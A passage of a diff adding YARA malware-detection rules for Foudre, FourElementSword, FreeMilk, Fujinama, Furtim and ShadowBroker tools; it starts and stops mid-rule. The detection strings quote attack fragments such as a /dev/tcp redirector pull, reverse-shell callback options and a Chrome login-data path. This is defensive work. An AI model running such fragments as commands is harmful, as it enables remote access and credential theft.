(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "1933a1e254b1657a6a2eb8ad1fbe6fa3") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "dfed2c71749b04dad46d0ce52834492c") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "9119aa701b39242a98be118d9c237ecc") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "b69d168e29fba6c88ad4e670949815aa") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "17c794f7056349cb82889b5e5b030d15") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "e15187f79b6916cb6763d29d215623c1") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "923963bb24f2e2ceac9f9759071dba88") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "9a2766aba7f2a56ef1ab24cf171ee0ed") or
(hash.md5(pe.resources[i].offset,pe.resources[i].length) == "ebe15bfb5a3944ea4952ddf0f73aa6e8"))
}
*/

View file

@ -0,0 +1,93 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-08-01
Identifier: Foudre
Reference: https://goo.gl/Nbqbt6
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule Foudre_Backdoor_1 {
meta:
description = "Detects Foudre Backdoor"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/Nbqbt6"
date = "2017-08-01"
hash1 = "7e73a727dc8f3c48e58468c3fd0a193a027d085f25fa274a6e187cf503f01f74"
hash2 = "7ce2c5111e3560aa6036f98b48ceafe83aa1ac3d3b33392835316c859970f8bc"
id = "ab2d43f4-fc35-5980-9b5d-98c5c4cfd012"
strings:
$s1 = "initialization failed: Reinstall the program" fullword wide
$s2 = "SnailDriver V1" fullword wide
$s3 = "lp.ini" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 100KB and 2 of them )
}
rule Foudre_Backdoor_Dropper_1 {
meta:
description = "Detects Foudre Backdoor"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/Nbqbt6"
date = "2017-08-01"
modified = "2023-01-07"
hash1 = "6bc9f6ac2f6688ed63baa29913eaf8c64738cf19933d974d25a0c26b7d01b9ac"
hash2 = "da228831089c56743d1fbc8ef156c672017cdf46a322d847a270b9907def53a5"
id = "38c7d05b-d545-53c5-8db7-a7925b5b7838"
strings:
$x1 = "536F594A96C5496CB3949A4DA4775B576E049C57696E646F77735C43757272656E7456657273696F6E5C5C52756E" fullword wide
$x2 = "2220263024C380B3278695851482EC32" fullword wide
$s1 = "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\\\Startup\\" wide
$s2 = "C:\\Documents and Settings\\All Users\\" wide
$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\\\Shell Folders" wide
$s4 = "ShellExecuteW" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 4 of them ) )
}
rule Foudre_Backdoor_Component_1 {
meta:
description = "Detects Foudre Backdoor"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/Nbqbt6"
date = "2017-08-01"
modified = "2023-01-07"
hash1 = "7c6206eaf0c5c9c6c8d8586a626b49575942572c51458575e51cba72ba2096a4"
hash2 = "db605d501d3a5ca2b0e3d8296d552fbbf048ee831be21efca407c45bf794b109"
id = "9070f581-64a7-5620-aff4-7f2cbd73099d"
strings:
/* $s1 = "Project1.dll" fullword ascii */
/* Better: Project1.dll\x00D1 */
$s1 = { 50 72 6F 6A 65 63 74 31 2E 64 6C 6C 00 44 31 }
$s2 = "winmgmts:\\\\localhost\\root\\SecurityCenter2" fullword wide
$s3 = "C:\\Documents and Settings\\All Users\\" wide
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and
( 3 of them ) or
( 2 of them and pe.exports("D1") )
)
}
rule Foudre_Backdoor_SFX {
meta:
description = "Detects Foudre Backdoor SFX"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/Nbqbt6"
date = "2017-08-01"
hash1 = "2b37ce9e31625d8b9e51b88418d4bf38ed28c77d98ca59a09daab01be36d405a"
hash2 = "4d51a0ea4ecc62456295873ff135e4d94d5899c4de749621bafcedbf4417c472"
id = "b5c7cd6b-48c8-5703-b695-19d226de1810"
strings:
$s1 = "main.exe" fullword ascii
$s2 = "pub.key" fullword ascii
$s3 = "WinRAR self-extracting archive" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}

View file

@ -0,0 +1,179 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-04-18
Identifier: FourElementSword
Reference: https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/
*/
/* Rule Set ----------------------------------------------------------------- */
rule FourElementSword_Config_File {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27"
id = "488a2344-3d8d-5769-aca8-9e14f38f5eb0"
strings:
$s0 = "01,,hccutils.dll,2" fullword ascii
$s1 = "RegisterDlls=OurDll" fullword ascii
$s2 = "[OurDll]" fullword ascii
$s3 = "[DefaultInstall]" fullword ascii /* Goodware String - occured 16 times */
$s4 = "Signature=\"$Windows NT$\"" fullword ascii /* Goodware String - occured 26 times */
condition:
4 of them
}
rule FourElementSword_T9000 {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
id = "35ae844e-52e1-5e6f-984d-aa75ebd2f60f"
strings:
$x1 = "D:\\WORK\\T9000\\" ascii
$x2 = "%s\\temp\\HHHH.dat" fullword wide
$s1 = "Elevate.dll" fullword wide
$s2 = "ResN32.dll" fullword wide
$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
$s4 = "igfxtray.exe" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 500KB and 1 of ($x*) ) or ( all of them )
}
rule FourElementSword_32DLL {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "7a200c4df99887991c638fe625d07a4a3fc2bdc887112437752b3df5c8da79b6"
id = "fc801364-9f40-50eb-90e1-99f8605014c7"
strings:
$x1 = "%temp%\\tmp092.tmp" fullword ascii
$s1 = "\\System32\\ctfmon.exe" ascii
$s2 = "%SystemRoot%\\System32\\" ascii
$s3 = "32.dll" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 660KB and $x1 ) or ( all of them )
}
rule FourElementSword_Keyainst_EXE {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "cf717a646a015ee72f965488f8df2dd3c36c4714ccc755c295645fe8d150d082"
id = "175fe2b0-3c76-5464-9a1a-218a09b25a5a"
strings:
$x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
$s1 = "ShellExecuteA" fullword ascii /* Goodware String - occured 266 times */
$s2 = "GetStartupInfoA" fullword ascii /* Goodware String - occured 2573 times */
$s3 = "SHELL32.dll" fullword ascii /* Goodware String - occured 3233 times */
condition:
( uint16(0) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
}
rule FourElementSword_ElevateDLL_2 {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "9c23febc49c7b17387767844356d38d5578727ee1150956164883cf555fe7f95"
id = "06879d75-18a3-5d49-a963-fa4bee379387"
strings:
$s1 = "Elevate.dll" fullword ascii
$s2 = "GetSomeF" fullword ascii
$s3 = "GetNativeSystemInfo" fullword ascii /* Goodware String - occured 530 times */
condition:
( uint16(0) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
}
rule FourElementSword_fslapi_dll_gui {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
id = "1cc73eaf-7463-5070-97e5-6ea4c7735371"
strings:
$s1 = "fslapi.dll.gui" fullword wide
$s2 = "ImmGetDefaultIMEWnd" fullword ascii /* Goodware String - occured 64 times */
$s3 = "RichOX" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 12KB and all of them )
}
rule FourElementSword_PowerShell_Start {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "9b6053e784c5762fdb9931f9064ba6e52c26c2d4b09efd6ff13ca87bbb33c692"
id = "62affc03-a408-5d8f-99da-58dead8646c5"
strings:
$s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
$s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
condition:
1 of them
}
rule FourElementSword_ResN32DLL {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
hash = "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f"
id = "3e1f6d8d-53ea-542f-ba49-39b4c86f3124"
strings:
$s1 = "\\Release\\BypassUAC.pdb" ascii
$s2 = "\\ResN32.dll" wide
$s3 = "Eupdate" fullword wide
condition:
all of them
}
/* Super Rules ------------------------------------------------------------- */
rule FourElementSword_ElevateDLL {
meta:
description = "Detects FourElementSword Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
date = "2016-04-18"
super_rule = 1
hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
id = "06879d75-18a3-5d49-a963-fa4bee379387"
strings:
$x1 = "Elevate.dll" fullword wide
$x2 = "ResN32.dll" fullword wide
$s1 = "Kingsoft\\Antivirus" fullword wide
$s2 = "KasperskyLab\\protected" fullword wide
$s3 = "Sophos" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 500KB and 1 of ($x*) and all of ($s*) )
or ( all of them )
}

View file

@ -0,0 +1,104 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-10-05
Identifier: FreeMilk
Reference: https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/
*/
import "pe"
/* Rule Set ----------------------------------------------------------------- */
rule FreeMilk_APT_Mal_1 {
meta:
description = "Detects malware from FreeMilk campaign"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
date = "2017-10-05"
hash1 = "34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9"
hash2 = "35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2"
hash3 = "0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313"
id = "eff37dba-d4a9-5e3d-9452-49f04ddcbe0b"
strings:
$x1 = "\\milk\\Release\\milk.pdb" ascii
$x2 = "E:\\BIG_POOH\\Project\\" ascii
$x3 = "Windows-KB271854-x86.exe" fullword wide
$s1 = "Windows-KB275122-x86.exe" fullword wide
$s2 = "\\wsatra.tmp" wide
$s3 = "%s\\Rar0tmpExtra%d.rtf" fullword wide
$s4 = "\"%s\" help" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 300KB and (
pe.imphash() == "108aa007b3d1b4817ff4c04d9b254b39" or
1 of ($x*) or
4 of them
)
}
rule FreeMilk_APT_Mal_2 {
meta:
description = "Detects malware from FreeMilk campaign"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
date = "2017-10-05"
hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
id = "ef5f400c-16f8-5374-af16-c8530ddb87ee"
strings:
$s1 = "failed to take the screenshot. err: %d" fullword ascii
$s2 = "runsample" fullword wide
$s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
$s4 = "win-%d.%d.%d-%d" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 400KB and (
pe.imphash() == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or
all of them
)
}
rule FreeMilk_APT_Mal_3 {
meta:
description = "Detects malware from FreeMilk campaign"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
date = "2017-10-05"
hash1 = "ef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2"
id = "152781f0-756b-50ab-b588-4af5fa4ce419"
strings:
$s1 = "CMD.EXE /C \"%s\"" fullword wide
$s2 = "\\command\\start.exe" wide
$s3 = ".bat;.com;.cmd;.exe" fullword wide
$s4 = "Unexpected failure opening HKCR key: %d" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 900KB and all of them )
}
rule FreeMilk_APT_Mal_4 {
meta:
description = "Detects malware from FreeMilk campaign"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
date = "2017-10-05"
hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
id = "44f919f7-8eda-5e70-88d5-9e81a761192c"
strings:
$x1 = "base64Encoded=\"TVqQAAMAAAAE" ascii
$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
$s2 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
$s3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
$s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
$s5 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
$s6 = "command =outFile &\" sysupdate\"" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and (
( pe.exports("getUpdate") and pe.number_of_exports == 1 ) or
1 of ($x*) or
3 of them
)
}

View file

@ -0,0 +1,22 @@
rule APT_MAL_Fujinama {
meta:
description = "Fujinama RAT used by Leonardo SpA Insider Threat"
author = "ReaQta Threat Intelligence Team"
reference = "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
date = "2021-01-07"
version = "1"
id = "b10b1e45-aa6c-53fa-8e02-7a325c3e12fb"
strings:
$kaylog_1 = "SELECT" wide ascii nocase
$kaylog_2 = "RIGHT" wide ascii nocase
$kaylog_3 = "HELP" wide ascii nocase
$kaylog_4 = "WINDOWS" wide ascii nocase
$computername = "computername" wide ascii nocase
$useragent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" wide ascii nocase
$pattern = "'()*+,G-./0123456789:" wide ascii nocase
$function_1 = "t_save" wide ascii nocase
$cftmon = "cftmon" wide ascii nocase
$font = "Tahoma" wide ascii nocase
condition:
uint16(0) == 0x5a4d and all of them
}

View file

@ -0,0 +1,57 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-07-15
Identifier: Furtim Malware
*/
rule Furtim_nativeDLL {
meta:
description = "Detects Furtim malware - file native.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "MISP 3971"
date = "2016-06-13"
hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
id = "4639b637-55d3-5591-9278-5a21de23ac72"
strings:
$s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
$op0 = { e0 b3 42 00 c7 84 24 ac } /* Opcode */
$op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 } /* Opcode */
$op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 } /* Opcode */
condition:
uint16(0) == 0x5a4d and filesize < 900KB and $s1 or all of ($op*)
}
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-07-16
Identifier: Furtim Parent
*/
rule Furtim_Parent_1 {
meta:
description = "Detects Furtim Parent Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
date = "2016-07-16"
hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
id = "a47719d2-1e4f-50a9-b340-55e13f5a24d5"
strings:
/* RC4 encryption password */
$x1 = "dqrChZonUF" fullword ascii
/* Other strings */
$s1 = "Egistec" fullword wide
$s2 = "Copyright (C) 2016" fullword wide
/* Op Code */
$op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
$op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
$op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
condition:
( uint16(0) == 0x5a4d and filesize < 900KB and
( $x1 or ( all of ($s*) and all of ($op*) ) ) ) or
all of them
}

View file

@ -0,0 +1,429 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-12-17
Identifier: Five Eyes ShadowBroker - Screenshots Extractions
*/
/* Rule Set ----------------------------------------------------------------- */
rule FVEY_ShadowBroker_Auct_Dez16_Strings {
meta:
description = "String from the ShodowBroker Files Screenshots - Dec 2016"
author = "Florian Roth (Nextron Systems)"
score = 60
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
id = "b1454c5d-01bc-599b-815c-aa1a3c52be3f"
strings:
$s1 = "bs.ratload" fullword ascii
$s2 = "Auditcleaner" fullword ascii
$s3 = "bll.perlbind" fullword ascii
$s4 = "bll.perlcallback" fullword ascii
$s5 = "bll.telnet" fullword ascii
$s6 = "bll.tnc.gr" fullword ascii
$s7 = "clean_wtmps.py" fullword ascii
$s8 = "cmsex.auto" fullword ascii
$s9 = "cottonaxe" fullword ascii
$s10 = "dectelnet.sh" fullword ascii
$s11 = "elatedmonkey" fullword ascii
$s12 = "electricslide.pl" fullword ascii
$s13 = "endlessdonut" fullword ascii
$s14 = "solaris8shellcode" fullword ascii
$s15 = "solaris9shellcode" fullword ascii
$s16 = "solaris10shellcode" fullword ascii
$s17 = "ys.ratload.sh" fullword ascii
$elf1 = "catflap" fullword ascii
$elf2 = "charm_penguin" fullword ascii
$elf3 = "charm_hammer" fullword ascii
$elf4 = "charm_saver" fullword ascii
$elf5 = "dampcrowd" fullword ascii
$elf7 = "dubmoat" fullword ascii
$elf8 = "ebbshave" fullword ascii
$elf9 = "eggbasket" fullword ascii
$elf10 = "toffeehammer" fullword ascii
$elf11 = "enemyrun" fullword ascii
$elf12 = "envoytomato" fullword ascii
$elf13 = "expoxyresin" fullword ascii
$elf14 = "estopmoonlit" fullword ascii
$elf15 = "linux-exactchange" fullword ascii
$elf17 = "ghost_sparc" fullword ascii
$elf18 = "jackpop" fullword ascii
$elf19 = "orleans_stride" fullword ascii
$elf20 = "prokserver" fullword ascii
$elf21 = "seconddate" fullword ascii
$elf22 = "shentysdelight" fullword ascii
$elf23 = "skimcountry" fullword ascii
$elf24 = "slyheretic" fullword ascii
$elf25 = "stoicsurgeon" fullword ascii
$elf26 = "strifeworld" fullword ascii
$elf27 = "suaveeyeful" fullword ascii
$elf28 = "suctionchar" fullword ascii
$elf29 = "vs.attack.linux" fullword ascii
$pe1 = "charm_razor" fullword ascii wide
$pe2 = "charm_saver" fullword ascii wide
$pe3 = "ghost_x86" fullword ascii wide
condition:
( uint16(0) == 0x457f and 1 of ($elf*) ) or
( uint16(0) == 0x5a4d and 1 of ($pe*) ) or
1 of ($s*)
}
rule FVEY_ShadowBroker_violetspirit {
meta:
description = "Auto-generated rule - file violetspirit.README"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
id = "4efea734-8cbc-53f7-bf92-5b3253721a81"
strings:
$x1 = "-i tgt_ipaddr -h tgt_hostname" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_gr_gr {
meta:
description = "Auto-generated rule - file gr.notes"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "b2b60dce7a4cfdddbd3d3f1825f1885728956bae009de3a307342fbdeeafcb79"
id = "c233159d-8d78-575b-b32b-21f704debfe2"
strings:
$s4 = "delete starting from: (root) LIST (root)" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_yellowspirit {
meta:
description = "Auto-generated rule - file user.tool.yellowspirit.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "a7c4b718fa92934a9182567288146ffa3312d9f3edc3872478c90e0e2814078c"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$s1 = "-l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999" fullword ascii
$s2 = "-s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_eleganteagle_opscript_1_0_0 {
meta:
description = "Auto-generated rule - file eleganteagle_opscript.1.0.0.6"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "57e223318de0a802874642652b3dc766128f25d7e8f320c6f04c6f2659bb4f7f"
id = "22855519-160c-57cf-b610-a611ca6813ed"
strings:
$x3 = "uploadnrun -e \"D=-ucIP_ADDRESS_OF_REDIR" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_opscript {
meta:
description = "Auto-generated rule - file opscript.se"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "275c91531a9ac5a240336714093b6aa146b8d7463cb2780cfeeceaea4c789682"
id = "d00752a3-d5c2-53a7-9a83-ad31cfb534af"
strings:
$s1 = "ls -l /tmp) | bdes -k 0x4790cae5ec154ccc|" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_shentysdelight {
meta:
description = "Auto-generated rule - file user.tool.shentysdelight.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "a564efeaae9c13fe09a27f2d62208a1dec0a19b4a156f5cfa96a0259366b8166"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$s1 = "echo -ne \"/var/run/COLFILE\\0\"" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_epichero {
meta:
description = "Auto-generated rule - file user.tool.epichero.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool {
meta:
description = "Auto-generated rule - file user.tool.elatedmonkey"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "98ae935dd9515529a34478cb82644828d94a2d273816d50485665535454e37cd"
id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
strings:
$x5 = "ELATEDMONKEY will only work of apache executes scripts" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_dubmoat {
meta:
description = "Auto-generated rule - file user.tool.dubmoat.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "bcd4ee336050488f5ffeb850d8eaa11eec34d8ba099b370d94d2c83f08a4d881"
id = "d6c0a00b-dda9-587f-a867-f3b632edd494"
strings:
$s1 = "### Verify version on target:" fullword ascii
$s2 = "/current/bin/ExtractData ./utmp > dub.TARGETNAME" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_strifeworld {
meta:
description = "Auto-generated rule - file strifeworld.1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "222b00235bf143645ad0d55b2b6839febc5b570e3def00b77699915a7c9cb670"
id = "a15c2034-8394-5e62-a5f0-d1506c19e585"
strings:
$s4 = "-p -n.\" strifeworld" fullword ascii
$s5 = "Running STRIFEWORLD not protected" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_pork {
meta:
description = "Auto-generated rule - file user.tool.pork.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "9c400aab74e75be8770387d35ca219285e2cedc0c7895225bbe567ce9c9dc078"
id = "ee5f88b1-6e58-5288-8b80-0d3d188e1ac6"
strings:
$x2 = "packrat -z RAT_REMOTE_NAME" fullword ascii
$s3 = "./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT" ascii
$s4 = "mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/RED" ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_ebbisland {
meta:
description = "Auto-generated rule - file user.tool.ebbisland.COMMON"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
date = "2016-12-17"
hash1 = "390e776ae15fadad2e3825a5e2e06c4f8de6d71813bef42052c7fd8494146222"
id = "fd312ba2-d590-5007-875c-008553c2b1b9"
strings:
$x1 = "-t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X"
$x2 = "-N -A SPECIFIC_SHELLCODE_ADDRESS" fullword ascii
condition:
1 of them
}
rule FVEY_ShadowBroker_user_tool_stoicsurgeon {
meta:
